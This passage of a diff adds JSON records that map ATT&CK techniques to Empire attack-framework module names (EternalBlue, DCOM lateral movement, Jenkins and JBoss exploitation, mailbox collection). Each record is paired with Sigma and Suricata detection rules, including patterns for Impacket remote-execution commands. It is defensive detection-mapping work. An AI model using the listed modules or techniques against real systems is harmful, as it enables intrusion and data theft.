"command": "powershell/exploitation/exploit_eternalblue", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/exploitation/exploit_jboss", + "ATT&CK Technique #1": "T1210", + "ATT&CK Technique #2": "T1190", + "Technique": "Exploitation of Remote Services", + "Concatenate for Python Dictionary": "\"powershell/exploitation/exploit_jboss\": [\"T1210\",\"T1190\"]," + }, + { + "Empire Module": "powershell/exploitation/exploit_jenkins", + "ATT&CK Technique #1": "T1210", + "ATT&CK Technique #2": "T1190", + "Technique": "Exploitation of Remote Services", + "Concatenate for Python Dictionary": "\"powershell/exploitation/exploit_jenkins\": [\"T1210\",\"T1190\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/get_exploitable_system", + "ATT&CK Technique #1": "T1210", + "ATT&CK Technique #2": "", + "Technique": "Exploitation of Remote Services", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/get_exploitable_system\": [\"T1210\"]," + }, + { + "Empire Module": "powershell/exploitation/exploit_eternalblue", + "ATT&CK Technique #1": "T1210", + "ATT&CK Technique #2": "T1212", + "Technique": "Exploitation of Remote Services", + "Concatenate for Python Dictionary": "\"powershell/exploitation/exploit_eternalblue\": [\"T1210\",\"T1212\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Suspicious Outbound RDP Connections", + "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", + "status": "experimental", + "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", + "references": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708" + ], + "author": "Markus Neis - Swisscom", + "date": "2019/05/15", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + 
"logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "DestinationPort": 3389, + "Initiated": "true" + }, + "filter": { + "Image": [ + "*\\mstsc.exe", + "*\\RTSApp.exe", + "*\\RTS2App.exe", + "*\\RDCMan.exe", + "*\\ws_TunnelService.exe", + "*\\RSSensor.exe", + "*\\RemoteDesktopManagerFree.exe", + "*\\RemoteDesktopManager.exe", + "*\\RemoteDesktopManager64.exe", + "*\\mRemoteNG.exe", + "*\\mRemote.exe", + "*\\Terminals.exe", + "*\\spiceworks-finder.exe", + "*\\FSDiscovery.exe", + "*\\FSAssessment.exe", + "*\\MobaRTE.exe", + "*\\chrome.exe", + "*\\thor.exe", + "*\\thor64.exe" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Other Remote Desktop RDP tools" + ], + "level": "high" + }, + { + "title": "Scanner PoC for CVE-2019-0708 RDP RCE vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "references": [ + "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", + "https://github.com/zerosum0x0/CVE-2019-0708" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "author": "Florian Roth (rule), Adam Bradbury (idea)", + "date": "2019/06/02", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4625, + "AccountName": "AAAAAAA" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, 
etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1175", + "command_list": [ + "powershell/lateral_movement/invoke_dcom" + ], + "commands": [ + { + "command": "powershell/lateral_movement/invoke_dcom", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/lateral_movement/invoke_dcom", + "ATT&CK Technique #1": "T1175", + "ATT&CK Technique #2": "", + "Technique": "Distributed Component Object Model", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_dcom\": [\"T1175\"]," + }, + { + "Rules": "ET Pro", + "SID": "2027190", + "Signature": "ET NETBIOS DCERPC DCOM ShellExecute - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027189", + "Signature": "ET NETBIOS DCERPC DCOM ExecuteShellCommand Call - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Open", + "SID": "2021616", + "Signature": "ET TROJAN PSEmpire Checkin via POST", + "Verified": "Yes" + } + ], + "queries": [ + { + 
"product": "Suricata (NSM)", + "query": "ET NETBIOS DCERPC DCOM ShellExecute - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET NETBIOS DCERPC DCOM ExecuteShellCommand Call - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET TROJAN PSEmpire Checkin via POST", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Impacket Lateralization Detection", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "experimental", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "references": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py" + ], + "author": "Ecco", + "date": "2019/09/03", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_other": { + "ParentImage": [ + "*\\wmiprvse.exe", + "*\\mmc.exe", + "*\\explorer.exe", + "*\\services.exe" + ], + "CommandLine": [ + "*cmd.exe* /Q /c * \\\\\\\\127.0.0.1\\\\*&1*" + ] + }, + "selection_atexec": { + "ParentCommandLine": [ + "*svchost.exe -k netsvcs", + "taskeng.exe*" + ], + "CommandLine": [ + "cmd.exe /C *Windows\\\\Temp\\\\*&1" + ] + }, + "condition": "(1 of selection_*)" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1047", + "attack.t1175" + ], + "falsepositives": [ + "pentesters" + ], + "level": "critical" + }, + { + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "experimental", + "description": "Detects a Windows command line executable started from MMC.", + "author": "Karneades, Swisscom CSIRT", + "tags": [ + 
"attack.lateral_movement", + "attack.t1175" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\mmc.exe", + "Image": [ + "*\\cmd.exe", + "*\\powershell.exe", + "*\\wscript.exe", + "*\\cscript.exe", + "*\\sh.exe", + "*\\bash.exe", + "*\\reg.exe", + "*\\regsvr32.exe", + "*\\BITSADMIN*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "Image", + "ParentCommandLine" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ], + [ + "Packet capture" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://securelist.com/muddywater/88059/", NaN + ] + }, + { + "technique_id": "T1190", + "command_list": [ + "powershell/lateral_movement/jenkins_script_console", + "python/exploit/web/jboss_jmx" + ], + "commands": [ + { + "command": "powershell/lateral_movement/jenkins_script_console", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/exploit/web/jboss_jmx", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/lateral_movement/jenkins_script_console", + "ATT&CK Technique 
#1": "T1190", + "ATT&CK Technique #2": "", + "Technique": "Exploit Public-Facing Application", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/jenkins_script_console\": [\"T1190\"]," + }, + { + "Empire Module": "python/exploit/web/jboss_jmx", + "ATT&CK Technique #1": "T1190", + "ATT&CK Technique #2": "", + "Technique": "Exploit Public-Facing Application", + "Concatenate for Python Dictionary": "\"python/exploit/web/jboss_jmx\": [\"T1190\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Oracle WebLogic Exploit", + "id": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", + "description": "Detects access to a webshell droped into a keytore folder on the WebLogic server", + "author": "Florian Roth", + "date": "2018/07/22", + "status": "experimental", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894", + "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/LandGrey/CVE-2018-2894" + ], + "logsource": { + "category": "webserver" + }, + "detection": { + "selection": { + "c-uri-path": [ + "*/config/keystore/*.js*" + ] + }, + "condition": "selection" + }, + "fields": [ + "c-ip", + "c-dns" + ], + "falsepositives": [ + "Unknown" + ], + "tags": [ + "attack.t1100", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "cve.2018-2894" + ], + "level": "critical" + }, + { + "title": "Potential RDP exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "references": [ + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep" + ], + "tags": [ + "attack.initial_access", + "attack.lateral_movement", + "attack.t1210", + "attack.t1190", + "car.2013-07-002" + ], + "status": "experimental", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "logsource": { + "product": "windows", + "service": 
"system" + }, + "detection": { + "selection": { + "EventID": [ + 56, + 50 + ], + "Source": "TermDD" + }, + "condition": "selection" + }, + "falsepositives": [ + "Bad connections or network interruptions" + ], + "level": "high" + }, + [ + "Application logs" + ], + [ + "Packet capture" + ], + [ + "Web logs" + ], + [ + "Web application firewall logs" + ], + [ + "Application logs" + ], + [ + "Packet capture" + ], + [ + "Web logs" + ], + [ + "Web application firewall logs" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "http://blogs.cisco.com/security/talos/threat-spotlight-group-72", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1114", + "command_list": [ + "powershell/management/mailraider/disable_security", + "powershell/management/mailraider/get_emailitems", + "powershell/management/mailraider/get_subfolders", + "powershell/management/mailraider/mail_search", + "powershell/management/mailraider/search_gal", + "powershell/management/mailraider/send_mail", + 
"powershell/management/mailraider/view_email", + "python/collection/osx/search_email" + ], + "commands": [ + { + "command": "powershell/management/mailraider/disable_security", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/get_emailitems", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/get_subfolders", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/mail_search", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/search_gal", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/send_mail", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/view_email", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/search_email", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/management/mailraider/disable_security", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": 
"\"powershell/management/mailraider/disable_security\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/get_emailitems", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/get_emailitems\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/get_subfolders", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/get_subfolders\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/mail_search", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/mail_search\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/search_gal", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/search_gal\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/send_mail", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/send_mail\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/view_email", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/view_email\": [\"T1114\"]," + }, + { + "Empire Module": "python/collection/osx/search_email", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"python/collection/osx/search_email\": [\"T1114\"]," 
+ } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Firewall Logs" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Firewall Logs" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
